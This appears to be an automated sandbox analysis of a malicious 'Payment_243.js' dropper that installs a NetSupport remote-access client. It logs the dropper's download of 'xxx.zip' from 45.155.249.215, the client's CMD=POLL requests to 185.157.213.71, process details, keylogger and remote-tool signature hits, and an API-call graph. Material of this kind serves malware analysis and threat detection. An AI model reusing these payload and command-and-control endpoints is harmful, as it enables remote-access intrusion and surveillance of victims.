                                                                                              Jan 14, 2025 16:25:38.335381985 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335393906 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335397959 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335413933 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335433960 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335438013 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335438013 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335448980 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335469007 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335472107 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335489035 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335494041 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335505009 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335509062 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335517883 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335541010 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335556030 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335566044 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335575104 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335577011 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335591078 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335592985 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335613012 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335623026 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335630894 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335654974 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335654974 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335685015 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335685015 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335695982 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335700989 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335706949 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335721016 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335724115 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335732937 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335737944 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335753918 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335758924 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335771084 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335773945 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335793018 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335798025 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335803032 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335810900 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335827112 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335832119 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335838079 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335850000 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335859060 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335870028 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335872889 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335882902 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335889101 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335906982 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335918903 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335921049 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335942984 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335957050 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335958004 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335968018 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335975885 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.335975885 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.335993052 CET804916345.155.249.215192.168.2.22
                                                                                              Jan 14, 2025 16:25:38.336002111 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336013079 CET4916380192.168.2.2245.155.249.215
                                                                                              Jan 14, 2025 16:25:38.336014986 CET804916345.155.249.215192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 14, 2025 16:25:49.779568911 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Jan 14, 2025 16:25:49.790889025 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Jan 14, 2025 16:25:49.794240952 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Jan 14, 2025 16:25:49.801624060 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 14, 2025 16:25:49.779568911 CET | 192.168.2.22 | 8.8.8.8 | 0xacee | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:25:49.794240952 CET | 192.168.2.22 | 8.8.8.8 | 0xacee | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 14, 2025 16:25:49.790889025 CET | 8.8.8.8 | 192.168.2.22 | 0xacee | No error (0) | geo.netsupportsoftware.com | | 104.26.0.231 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:25:49.790889025 CET | 8.8.8.8 | 192.168.2.22 | 0xacee | No error (0) | geo.netsupportsoftware.com | | 172.67.68.212 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:25:49.790889025 CET | 8.8.8.8 | 192.168.2.22 | 0xacee | No error (0) | geo.netsupportsoftware.com | | 104.26.1.231 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:25:49.801624060 CET | 8.8.8.8 | 192.168.2.22 | 0xacee | No error (0) | geo.netsupportsoftware.com | | 172.67.68.212 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:25:49.801624060 CET | 8.8.8.8 | 192.168.2.22 | 0xacee | No error (0) | geo.netsupportsoftware.com | | 104.26.0.231 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 16:25:49.801624060 CET | 8.8.8.8 | 192.168.2.22 | 0xacee | No error (0) | geo.netsupportsoftware.com | | 104.26.1.231 | A (IP address) | IN (0x0001) | false
                                                                                              • 45.155.249.215
• 185.157.213.71 (connection: keep-alive; cmd=poll; info=1; ack=1)
                                                                                              • geo.netsupportsoftware.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49163 | 45.155.249.215 | 80 | 3592 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 16:25:35.527911901 CET | 336 | OUT | GET /xxx.zip?mt=6364 HTTP/1.1
                                                                                              Accept: */*
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: 45.155.249.215
                                                                                              Connection: Keep-Alive
Jan 14, 2025 16:25:36.126008034 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                              Server: nginx/1.24.0 (Ubuntu)
                                                                                              Date: Tue, 14 Jan 2025 15:25:36 GMT
                                                                                              Content-Type: application/zip
                                                                                              Content-Length: 2845498
                                                                                              Connection: keep-alive
                                                                                              Last-Modified: Mon, 13 Jan 2025 16:08:22 GMT
                                                                                              ETag: "2b6b3a-62b98a754cee9"
                                                                                              Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49164 | 185.157.213.71 | 443 | 3968 | C:\ProgramData\i99ekubc\client32.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 16:25:49.020201921 CET | 220 | OUT | POST http://185.157.213.71/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 185.157.213.71
Connection: Keep-Alive
CMD=POLL
INFO=1
ACK=1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49165 | 172.67.68.212 | 80 | 3968 | C:\ProgramData\i99ekubc\client32.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 16:25:49.836766005 CET | 118 | OUT | GET /location/loca.asp HTTP/1.1
                                                                                              Host: geo.netsupportsoftware.com
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
Jan 14, 2025 16:25:50.500916004 CET | 1135 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 14 Jan 2025 15:25:50 GMT
                                                                                              Content-Type: text/html; charset=us-ascii
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              CF-Ray: 901ea414fa9c41de-EWR
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              cf-apo-via: origin,host
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i1a0Dx0OGKXHyff4tWOx9huhmxu%2FrfpGODYCY3eCxDk%2BoYOYnaiuMoMz%2Felupk%2BTzjfpiLGxRUjNSSN2%2FaPZ1njy6u0TbmV5Jr%2BA1HNDIEKeTAseAOqNo1O6%2BgdO6dLvCRsR6g%2Fy2fdL0D0%2B"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1577&rtt_var=788&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                              Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49166 | 172.67.68.212 | 80 | 3968 | C:\ProgramData\i99ekubc\client32.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 16:25:50.617533922 CET | 118 | OUT | GET /location/loca.asp HTTP/1.1
                                                                                              Host: geo.netsupportsoftware.com
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
Jan 14, 2025 16:25:51.294994116 CET | 1129 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 14 Jan 2025 15:25:51 GMT
                                                                                              Content-Type: text/html; charset=us-ascii
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              CF-Ray: 901ea419dc7059bb-IAD
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              cf-apo-via: origin,host
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wSZ%2BRGP%2FBskJ7LnFLn%2BdwOJy8PAomrnw07fCdNdJ0YQbD5EIWgljEF5buCYnwlqPT%2BhhnetsEziM50DbTASpiI6M4oSMzf%2Frv6qXOTbv4t9lpKca36wLWM%2BL6M7ghXFQ93uZQZw11KSih7sn"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8053&min_rtt=8053&rtt_var=4026&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                              Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49167 | 172.67.68.212 | 80 | 3968 | C:\ProgramData\i99ekubc\client32.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 16:25:51.300849915 CET | 118 | OUT | GET /location/loca.asp HTTP/1.1
                                                                                              Host: geo.netsupportsoftware.com
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
Jan 14, 2025 16:25:52.072853088 CET | 1128 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 14 Jan 2025 15:25:52 GMT
                                                                                              Content-Type: text/html; charset=us-ascii
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              CF-Ray: 901ea41e5c173b74-IAD
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              cf-apo-via: origin,host
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LKEYObFWeGsbhjPcHiwLQ5zFRGBnMAimUDbPlqHud%2F6nLggXW2TDZkaH0QDok7leAQbRybrJDBESoNHc%2BZAPEz9GZdTbMBoHCZ82rfT%2BMeo9JV5oroEorvLVQi948Unz5j7mf%2Bgr4vZZtulj"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=23406&min_rtt=23406&rtt_var=11703&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                              Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                              Target ID:0
                                                                                              Start time:10:24:41
                                                                                              Start date:14/01/2025
                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js"
                                                                                              Imagebase:0xff2b0000
                                                                                              File size:168'960 bytes
                                                                                              MD5 hash:045451FA238A75305CC26AC982472367
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:4
                                                                                              Start time:10:25:46
                                                                                              Start date:14/01/2025
                                                                                              Path:C:\ProgramData\i99ekubc\client32.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\ProgramData\i99ekubc\client32.exe"
                                                                                              Imagebase:0xa10000
                                                                                              File size:103'824 bytes
                                                                                              MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.644024735.0000000000A12000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.644043633.0000000001F93000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000000.506306260.0000000000A12000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\i99ekubc\client32.exe, Author: Joe Security
                                                                                              Antivirus matches:
                                                                                              • Detection: 32%, ReversingLabs
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                                Execution Graph

                                                                                                Execution Coverage:5.7%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:20.4%
                                                                                                Total number of Nodes:2000
                                                                                                Total number of Limit Nodes:129
93501->93507 93502->93491 93700 11142d90 93502->93700 93503 1113a3f5 93803 1103f980 68 API calls 93503->93803 93519 1113a485 93504->93519 93795 1110fff0 InterlockedIncrement 93505->93795 93510 11147060 std::locale::facet::_Facet_Register 21 API calls 93507->93510 93510->93443 93512 1113a400 93804 1103f940 68 API calls 93512->93804 93513 1113a398 93796 1104d790 879 API calls 93513->93796 93516 1113a40b 93805 11110000 InterlockedDecrement 93516->93805 93517 1113a3a3 93797 1104ecd0 879 API calls 93517->93797 93520 1113a4cd 93519->93520 93521 1113a4d9 GetTickCount 93519->93521 93524 1113a4aa 93519->93524 93519->93545 93520->93521 93520->93545 93525 1113a4eb 93521->93525 93521->93545 93523 1113a3d9 93523->93479 93527 11147060 std::locale::facet::_Facet_Register 21 API calls 93524->93527 93529 11143a50 145 API calls 93525->93529 93526 1113a3ae 93798 1104ed40 879 API calls 93526->93798 93528 1113a4b5 GetTickCount 93527->93528 93528->93545 93531 1113a4f7 93529->93531 93533 11147af0 269 API calls 93531->93533 93532 1113a3b9 93799 1104d7d0 879 API calls 93532->93799 93535 1113a502 93533->93535 93537 11143a50 145 API calls 93535->93537 93536 1113a3c4 93536->93479 93800 110ec320 285 API calls 93536->93800 93538 1113a515 93537->93538 93806 110261a0 LoadLibraryA 93538->93806 93541 1113a522 93541->93541 93807 1112d6e0 GetProcAddress SetLastError 93541->93807 93543 1113a569 93544 1113a573 FreeLibrary 93543->93544 93543->93545 93544->93545 93545->93422 93808 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 93546->93808 93548 1102995e 93549 11029973 93548->93549 93809 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 93548->93809 93810 11089fe0 269 API calls 2 library calls 93549->93810 93552 1102997e 93552->93415 93554 11134872 93553->93554 93555 11134b94 93553->93555 93556 1105e820 79 API calls 93554->93556 93557 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 
5 API calls 93555->93557 93559 11134892 93556->93559 93558 11134bac 93557->93558 93601 11134310 93558->93601 93559->93555 93560 1113489a GetLocalTime 93559->93560 93561 111348d1 LoadLibraryA 93560->93561 93562 111348b0 93560->93562 93811 11009940 LoadLibraryA 93561->93811 93563 11147060 std::locale::facet::_Facet_Register 21 API calls 93562->93563 93565 111348c5 93563->93565 93565->93561 93566 11134925 93812 110161e0 LoadLibraryA 93566->93812 93568 11134930 GetCurrentProcess 93569 11134955 GetProcAddress 93568->93569 93570 1113496d GetProcessHandleCount 93568->93570 93569->93570 93572 11134976 SetLastError 93569->93572 93571 1113497e 93570->93571 93573 111349a2 93571->93573 93574 11134988 GetProcAddress 93571->93574 93572->93571 93576 111349b0 GetProcAddress 93573->93576 93577 111349ca 93573->93577 93574->93573 93575 111349d7 SetLastError 93574->93575 93575->93576 93576->93577 93578 111349e4 SetLastError 93576->93578 93579 111349ef GetProcAddress 93577->93579 93578->93579 93580 11134a01 K32GetProcessMemoryInfo 93579->93580 93581 11134a0f SetLastError 93579->93581 93582 11134a17 93580->93582 93581->93582 93583 11147060 std::locale::facet::_Facet_Register 21 API calls 93582->93583 93589 11134a8d 93582->93589 93583->93589 93584 11134b6a 93585 11134b7a FreeLibrary 93584->93585 93586 11134b7d 93584->93586 93585->93586 93587 11134b87 FreeLibrary 93586->93587 93588 11134b8a 93586->93588 93587->93588 93588->93555 93590 11134b91 FreeLibrary 93588->93590 93589->93584 93591 1105e820 79 API calls 93589->93591 93590->93555 93592 11134ade 93591->93592 93593 1105e820 79 API calls 93592->93593 93594 11134b06 93593->93594 93595 1105e820 79 API calls 93594->93595 93596 11134b2d 93595->93596 93597 1105e820 79 API calls 93596->93597 93598 11134b54 93597->93598 93598->93584 93599 11134b65 93598->93599 93813 11027de0 265 API calls 2 library calls 93599->93813 93603 1113433d 93601->93603 93602 111347f9 93602->93421 93602->93422 93704 11139a70 93602->93704 93603->93602 93604 110d1930 268 
API calls 93603->93604 93605 1113439e 93604->93605 93606 110d1930 268 API calls 93605->93606 93607 111343a9 93606->93607 93608 111343d7 93607->93608 93609 111343ee 93607->93609 93814 11029a70 265 API calls 2 library calls 93608->93814 93611 11147060 std::locale::facet::_Facet_Register 21 API calls 93609->93611 93613 111343fc 93611->93613 93815 110d1530 265 API calls 93613->93815 93701 11142daf 93700->93701 93702 11142d9a 93700->93702 93701->93491 93816 11142400 93702->93816 93705 11139eaf 93704->93705 93708 11139a8d 93704->93708 93706 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 93705->93706 93707 11139ebe 93706->93707 93707->93427 93708->93705 93709 11145c70 std::locale::facet::_Facet_Register 90 API calls 93708->93709 93710 11139acc 93709->93710 93710->93705 93711 1105e820 79 API calls 93710->93711 93712 11139afb 93711->93712 93948 1112d860 93712->93948 93714 11139c40 PostMessageA 93715 11139c55 93714->93715 93717 11139c65 93715->93717 93957 11110000 InterlockedDecrement 93715->93957 93716 1105e820 79 API calls 93718 11139c3c 93716->93718 93720 11139c6b 93717->93720 93721 11139c8d 93717->93721 93718->93714 93718->93715 93723 11139cc3 std::ios_base::_Ios_base_dtor 93720->93723 93724 11139cde 93720->93724 93958 11131320 313 API calls std::locale::facet::_Facet_Register 93721->93958 93731 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 93723->93731 93726 11143a50 145 API calls 93724->93726 93725 11139c95 93959 11147ad0 267 API calls 93725->93959 93729 11139ce3 93726->93729 93732 11147af0 269 API calls 93729->93732 93730 11139c9f 93960 1112da60 SetDlgItemTextA 93730->93960 93734 11139cda 93731->93734 93735 11139cea SetWindowTextA 93732->93735 93734->93427 93737 11139d06 93735->93737 93743 11139d0d std::ios_base::_Ios_base_dtor 93735->93743 93736 11139cb0 std::ios_base::_Ios_base_dtor 
93736->93720 93961 111361c0 299 API calls 5 library calls 93737->93961 93738 11146710 271 API calls 93739 11139beb 93738->93739 93739->93714 93739->93716 93741 11139d64 93744 11139d78 93741->93744 93745 11139e3c 93741->93745 93742 11139d37 93742->93741 93748 11139d4c 93742->93748 93743->93741 93743->93742 93962 111361c0 299 API calls 5 library calls 93743->93962 93749 11139d9c 93744->93749 93964 111361c0 299 API calls 5 library calls 93744->93964 93747 11139e5d 93745->93747 93752 11139e4b 93745->93752 93753 11139e44 93745->93753 93970 110f8b70 86 API calls 93747->93970 93963 11132120 147 API calls 93748->93963 93966 110f8b70 86 API calls 93749->93966 93969 11132120 147 API calls 93752->93969 93968 111361c0 299 API calls 5 library calls 93753->93968 93755 11139e68 93755->93705 93761 11139e6c IsWindowVisible 93755->93761 93757 11139da7 93757->93705 93763 11139daf IsWindowVisible 93757->93763 93759 11139d5c 93759->93741 93761->93705 93765 11139e7e IsWindowVisible 93761->93765 93762 11139d86 93762->93749 93766 11139d92 93762->93766 93763->93705 93767 11139dc6 93763->93767 93764 11139e5a 93764->93747 93765->93705 93768 11139e8b EnableWindow 93765->93768 93965 11132120 147 API calls 93766->93965 93770 11145c70 std::locale::facet::_Facet_Register 90 API calls 93767->93770 93971 11132120 147 API calls 93768->93971 93773 11139dd1 93770->93773 93772 11139d99 93772->93749 93773->93705 93775 11139ddc GetForegroundWindow IsWindowVisible 93773->93775 93774 11139ea2 EnableWindow 93774->93705 93776 11139e01 93775->93776 93777 11139df6 EnableWindow 93775->93777 93967 11132120 147 API calls 93776->93967 93777->93776 93779 11139e08 93780 11139e1e EnableWindow 93779->93780 93781 11139e17 SetForegroundWindow 93779->93781 93782 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 93780->93782 93781->93780 93783 11139e38 93782->93783 93783->93427 93784->93480 93785->93490 93786->93467 93787->93482 
93788->93456 93789->93442 93790->93455 93791->93470 93792->93478 93793->93472 93794->93505 93795->93513 93796->93517 93797->93526 93798->93532 93799->93536 93800->93523 93801->93493 93802->93503 93803->93512 93804->93516 93805->93523 93806->93541 93807->93543 93808->93548 93809->93548 93810->93552 93811->93566 93812->93568 93813->93584 93817 1114243f 93816->93817 93870 11142438 std::ios_base::_Ios_base_dtor 93816->93870 93818 111101b0 std::locale::facet::_Facet_Register 265 API calls 93817->93818 93819 11142446 93818->93819 93822 11142476 93819->93822 93823 11061aa0 301 API calls 93819->93823 93820 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 93821 11142d8a 93820->93821 93821->93701 93824 11062220 275 API calls 93822->93824 93823->93822 93825 111424b2 93824->93825 93826 111424b9 RegCloseKey 93825->93826 93827 111424c0 std::locale::facet::_Facet_Register 93825->93827 93826->93827 93828 111424cf 93827->93828 93829 1102a6d0 354 API calls 93827->93829 93830 11145990 267 API calls 93828->93830 93829->93828 93831 111424ec 93830->93831 93832 11143e00 std::locale::facet::_Facet_Register 8 API calls 93831->93832 93833 11142500 93832->93833 93834 11142517 93833->93834 93835 11063880 330 API calls 93833->93835 93836 111101b0 std::locale::facet::_Facet_Register 265 API calls 93834->93836 93835->93834 93837 1114251e 93836->93837 93838 1114253a 93837->93838 93839 11061710 293 API calls 93837->93839 93840 111101b0 std::locale::facet::_Facet_Register 265 API calls 93838->93840 93839->93838 93841 11142553 93840->93841 93842 1114256f 93841->93842 93843 11061710 293 API calls 93841->93843 93844 111101b0 std::locale::facet::_Facet_Register 265 API calls 93842->93844 93843->93842 93845 11142588 93844->93845 93846 111425a4 93845->93846 93847 11061710 293 API calls 93845->93847 93848 11061290 268 API calls 93846->93848 93847->93846 93849 111425cd 93848->93849 93850 11061290 268 API calls 
